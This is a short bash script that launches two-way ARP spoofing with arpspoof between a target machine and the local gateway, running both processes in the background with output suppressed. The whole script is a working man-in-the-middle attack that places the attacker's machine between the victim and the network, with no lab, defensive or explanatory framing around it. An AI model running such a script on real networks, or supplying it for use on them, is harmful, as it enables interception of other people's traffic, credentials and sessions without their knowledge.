#!/bin/bash

# Set the target IP and the gateway IP
TARGET_IP="192.168.1.5"
GATEWAY_IP="192.168.1.1"

# Set your network interface
INTERFACE="eth0"

# Perform ARP spoofing and discard only standard output
arpspoof -i $INTERFACE -t $TARGET_IP $GATEWAY_IP > /dev/null &
arpspoof -i $INTERFACE -t $GATEWAY_IP $TARGET_IP > /dev/null &